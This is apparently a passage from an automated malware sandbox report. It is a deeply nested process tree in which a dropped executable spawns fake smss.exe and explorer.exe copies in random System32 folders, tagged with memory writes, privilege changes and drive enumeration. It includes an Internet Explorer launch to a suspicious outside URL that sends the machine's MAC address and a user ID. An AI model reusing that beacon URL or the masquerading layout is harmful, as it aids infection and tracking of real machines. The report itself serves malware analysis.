  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://dd.zxcvbnmzxcvbnm.com:9999/Chinago.ashx?Mac=66:F7:23:73:7C:E2&UserId=114&Bate=1.08
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2972
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://dd.zxcvbnmzxcvbnm.com:9999/Chinago.ashx?Mac=66:F7:23:73:7C:E2&UserId=114&Bate=1.08
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2976
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2976 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2596
- \??\c:\qqkavmfxmtfe.exe
  c:\qqkavmfxmtfe.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2652
- - C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
    C:\Windows\system32\dnteevmgxabg\smss.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Enumerates connected drives
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1920
  - - C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
      C:\Windows\system32\dnteevmgxabg\smss.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2744
    - - C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1900
      - C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1904
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1688
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1924
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2760
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:848
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1180
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        12⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3040
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        13⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1864
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        14⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1880
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        15⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1216
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        16⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:560
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        17⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1172
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        18⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1560
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        19⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1152
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        20⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1432
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        21⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2392
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        22⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1608
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        23⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2692
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        24⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1992
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        25⤵
        Executes dropped EXE
        Enumerates connected drives
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2248
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        26⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1228
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        27⤵
        
        PID:380
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        28⤵
        Drops file in System32 directory
        
        PID:2944
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        29⤵
        Drops file in System32 directory
        
        PID:1996
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        30⤵
        
        PID:3212
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        31⤵
        
        PID:3420
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        32⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:3612
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        33⤵
        Enumerates connected drives
        
        PID:3832
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        34⤵
        
        PID:2016
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        32⤵
        
        PID:6268
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        31⤵
        
        PID:5956
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        30⤵
        
        PID:3596
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        29⤵
        
        PID:2132
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        28⤵
        
        PID:4232
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        27⤵
        
        PID:1896
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        26⤵
        
        PID:5564
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        24⤵
        
        PID:4956
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        23⤵
        
        PID:4316
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        22⤵
        
        PID:4908
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        21⤵
        
        PID:4556
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        20⤵
        
        PID:4256
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        19⤵
        
        PID:1240
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        18⤵
        Drops file in System32 directory
        
        PID:3896
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        19⤵
        Enumerates connected drives
        
        PID:3592
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        17⤵
        
        PID:3680
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        18⤵
        
        PID:3928
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        16⤵
        Enumerates connected drives
        
        PID:3464
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        17⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:3656
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        18⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:3884
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        19⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        19⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        15⤵
        
        PID:3252
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        16⤵
        Enumerates connected drives
        
        PID:3456
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        17⤵
        
        PID:3668
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        18⤵
        Drops file in System32 directory
        
        PID:3876
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        19⤵
        
        PID:3804
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        18⤵
        
        PID:6160
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        17⤵
        
        PID:928
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        14⤵
        
        PID:3076
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        15⤵
        Enumerates connected drives
        
        PID:3260
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        16⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:3448
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        17⤵
        Drops file in System32 directory
        
        PID:3648
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        18⤵
        
        PID:3868
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        19⤵
        
        PID:2128
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        19⤵
        
        PID:1648
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        13⤵
        Drops file in System32 directory
        
        PID:2952
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        14⤵
        Drops file in System32 directory
        
        PID:3092
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        15⤵
        Drops file in System32 directory
        
        PID:3268
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        16⤵
        Drops file in System32 directory
        
        PID:3484
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        17⤵
        
        PID:3704
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        18⤵
        Enumerates connected drives
        
        PID:3976
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        12⤵
        Enumerates connected drives
        
        PID:1040
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        13⤵
        Enumerates connected drives
        
        PID:1652
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        14⤵
        
        PID:3084
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        15⤵
        Drops file in System32 directory
        
        PID:3276
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        16⤵
        Drops file in System32 directory
        
        PID:3492
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        17⤵
        Drops file in System32 directory
        
        PID:3696
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        18⤵
        Enumerates connected drives
        
        PID:3936
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        18⤵
        
        PID:6228
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        14⤵
        
        PID:1588
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        13⤵
        
        PID:564
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        11⤵
        
        PID:1584
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        12⤵
        
        PID:2184
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        13⤵
        
        PID:2940
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        14⤵
        
        PID:3136
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        15⤵
        
        PID:3316
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        16⤵
        
        PID:3508
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        17⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:3720
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        18⤵
        
        PID:3992
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        14⤵
        
        PID:4080
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        13⤵
        
        PID:3828
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        12⤵
        
        PID:1140
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        10⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        
        PID:1888
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        11⤵
        
        PID:1596
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        12⤵
        Enumerates connected drives
        
        PID:1564
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        13⤵
        Enumerates connected drives
        
        PID:1464
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        14⤵
        Drops file in System32 directory
        
        PID:3156
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        15⤵
        
        PID:3340
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        16⤵
        
        PID:3536
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        17⤵
        
        PID:3744
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        18⤵
        Enumerates connected drives
        
        PID:3984
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        13⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        9⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        
        PID:2780
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:584
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        11⤵
        Enumerates connected drives
        
        PID:1320
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        12⤵
        Enumerates connected drives
        
        PID:2124
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        13⤵
        
        PID:452
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        14⤵
        
        PID:3184
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        15⤵
        Drops file in System32 directory
        
        PID:3380
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        16⤵
        Enumerates connected drives
        
        PID:3576
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        17⤵
        
        PID:3788
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        18⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        18⤵
        
        PID:6248
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        17⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        16⤵
        
        PID:6168
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        13⤵
        
        PID:3604
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        10⤵
        
        PID:6008
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2460
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        9⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2932
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        10⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1760
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        11⤵
        Enumerates connected drives
        
        PID:1480
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        12⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:2712
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        13⤵
        
        PID:288
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        14⤵
        Drops file in System32 directory
        
        PID:3148
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        15⤵
        
        PID:3348
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        16⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:3548
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        17⤵
        
        PID:3756
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        18⤵
        
        PID:3960
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        18⤵
        
        PID:5952
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        17⤵
        
        PID:4224
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        14⤵
        
        PID:1560
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        11⤵
        
        PID:5884
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        10⤵
        
        PID:5984
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        9⤵
        
        PID:1272
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2252
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        8⤵
        Executes dropped EXE
        Enumerates connected drives
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1916
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        9⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        
        PID:2548
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1020
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        11⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        
        PID:1084
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        12⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        13⤵
        Enumerates connected drives
        
        PID:2496
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        14⤵
        Enumerates connected drives
        
        PID:3108
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        15⤵
        
        PID:3300
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        16⤵
        
        PID:3528
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        17⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:3764
        
        C:\Windows\SysWOW64\dnteevmgxabg\smss.exe
        
        C:\Windows\system32\dnteevmgxabg\smss.exe
        18⤵
        Enumerates connected drives
        
        PID:3952
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        18⤵
        
        PID:6240
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        17⤵
        
        PID:2156
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        14⤵
        
        PID:2072
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        12⤵
        
        PID:6192
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        10⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        9⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\hghrucnuijex\explorer.exe
        
        C:\Windows\system32\hghrucnuijex\explorer.exe
        8⤵
        
        PID:5080
